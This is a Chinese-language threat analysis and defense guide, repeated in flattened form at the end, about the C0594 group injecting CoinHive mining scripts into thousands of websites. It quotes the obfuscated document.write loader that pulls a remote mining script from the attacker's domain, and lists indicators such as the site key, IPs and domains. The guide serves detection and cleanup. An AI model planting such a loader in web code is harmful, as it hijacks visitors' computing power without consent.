C0594组织恶意挖矿攻击,已攻陷数千个网站
字数 1268 2025-08-18 11:37:12

C0594组织恶意挖矿攻击事件分析与防御指南

一、事件概述

腾讯御见威胁情报中心监测发现,一个名为C0594的黑客组织对包括传统企业、互联网公司、学校和政府机构在内的数千个网站实施了有组织的恶意挖矿攻击。

攻击特点

  • 通过注入恶意JS脚本实现挖矿
  • 使用动态加载技术隐藏攻击行为
  • 所有攻击使用相同的CoinHive Site Key
  • 攻击规模大,影响范围广

二、攻击技术分析

1. 攻击流程

  1. 入侵网站:利用网站漏洞植入恶意代码
  2. 注入恶意JS:在网站核心JS文件(如jquery.cookie.js)中注入
  3. 动态加载:通过document.write加载远程恶意脚本 
    document.write('<script src=http://a'+'.c059'+'4.com/?e=5></script>')
  4. 挖矿执行:加载的脚本(hxxp://a.c0594.com/?e=5)会调用另一个脚本(hxxp://a.c0594.com/?js=1)提供的CoinHive挖矿代码
  5. 收益归集:所有挖矿收益归集到同一Site Key(99nheD84S8eJK7eD4pufvR5Wd1KGjxlj)

2. 攻击工具溯源

攻击者使用名为"Black Spider"的黑帽辅助工具,该工具具有以下功能:

  • 自动爬取Getshell
  • 自动扫描注入点
  • 自动文件探测
  • 旁站C段扫描
  • 漏洞扫描
  • CMS安全检测
  • 批量检测注入

支持的漏洞类型

  • 包含100多种建站系统漏洞
  • Fck上传漏洞
  • Struct漏洞
  • SQL注入漏洞
  • WordPress漏洞等

三、防御建议

1. 网站管理员防御措施

  1. 漏洞扫描与修复

    • 使用腾讯企业安全"御知"(https://s.tencent.com/product/yuzhi/index.html)进行风险扫描
    • 及时修复Web服务器建站系统安全漏洞

  2. 恶意代码检测

    • 检查网站源码中是否包含src=hxxp://a'+'.c059'+'4.com/?e=5
    • 发现后立即删除相关恶意代码

  3. 防护平台部署

    • 使用腾讯云网站管家智能防护平台(https://cloud.tencent.com/product/waf)
    • 具备Web入侵防护、0Day漏洞补丁修复等多维度防御策略

2. 普通用户防护

  • 安装腾讯电脑管家拦截含挖矿木马的网页

四、技术细节补充

  1. 挖矿统计

    • Site Key: 99nheD84S8eJK7eD4pufvR5Wd1KGjxlj
    • 月流量达1,011,442,在网页挖矿top榜排名第56位(数据来自whorunscoinhive.com)

  2. 基础设施关联

    • 域名a.c0594.com曾解析到IP 62.210.181.55和47.89.176.191
    • 关联域名包括xxx.c0594.com和xxx.094n.com
    • 黑客工具网站member.094n.com与攻击域名存在关联

  3. 组织背景

    • 该组织最早活动可追溯到2014年
    • 工具由Alihack.com开发
    • 具有成熟的漏洞利用和攻击基础设施

五、受影响网站(部分示例)

  • bayimg.co
  • 其他数千个未公开名称的网站

通过以上分析和防御建议,网站管理员和用户可以有效识别和防御此类挖矿攻击。

C0594组织恶意挖矿攻击事件分析与防御指南 一、事件概述 腾讯御见威胁情报中心监测发现,一个名为C0594的黑客组织对包括传统企业、互联网公司、学校和政府机构在内的数千个网站实施了有组织的恶意挖矿攻击。 攻击特点 : 通过注入恶意JS脚本实现挖矿 使用动态加载技术隐藏攻击行为 所有攻击使用相同的CoinHive Site Key 攻击规模大,影响范围广 二、攻击技术分析 1. 攻击流程 入侵网站 :利用网站漏洞植入恶意代码 注入恶意JS :在网站核心JS文件(如jquery.cookie.js)中注入 动态加载 :通过document.write加载远程恶意脚本 挖矿执行 :加载的脚本(hxxp://a.c0594.com/?e=5)会调用另一个脚本(hxxp://a.c0594.com/?js=1)提供的CoinHive挖矿代码 收益归集 :所有挖矿收益归集到同一Site Key(99nheD84S8eJK7eD4pufvR5Wd1KGjxlj) 2. 攻击工具溯源 攻击者使用名为"Black Spider"的黑帽辅助工具,该工具具有以下功能: 自动爬取Getshell 自动扫描注入点 自动文件探测 旁站C段扫描 漏洞扫描 CMS安全检测 批量检测注入 支持的漏洞类型 : 包含100多种建站系统漏洞 Fck上传漏洞 Struct漏洞 SQL注入漏洞 WordPress漏洞等 三、防御建议 1. 网站管理员防御措施 漏洞扫描与修复 使用腾讯企业安全"御知"(https://s.tencent.com/product/yuzhi/index.html)进行风险扫描 及时修复Web服务器建站系统安全漏洞 恶意代码检测 检查网站源码中是否包含 src=hxxp://a'+'.c059'+'4.com/?e=5 发现后立即删除相关恶意代码 防护平台部署 使用腾讯云网站管家智能防护平台(https://cloud.tencent.com/product/waf) 具备Web入侵防护、0Day漏洞补丁修复等多维度防御策略 2. 普通用户防护 安装腾讯电脑管家拦截含挖矿木马的网页 四、技术细节补充 挖矿统计 : Site Key: 99nheD84S8eJK7eD4pufvR5Wd1KGjxlj 月流量达1,011,442,在网页挖矿top榜排名第56位(数据来自whorunscoinhive.com) 基础设施关联 : 域名a.c0594.com曾解析到IP 62.210.181.55和47.89.176.191 关联域名包括xxx.c0594.com和xxx.094n.com 黑客工具网站member.094n.com与攻击域名存在关联 组织背景 : 该组织最早活动可追溯到2014年 工具由Alihack.com开发 具有成熟的漏洞利用和攻击基础设施 五、受影响网站(部分示例) bayimg.co 其他数千个未公开名称的网站 通过以上分析和防御建议,网站管理员和用户可以有效识别和防御此类挖矿攻击。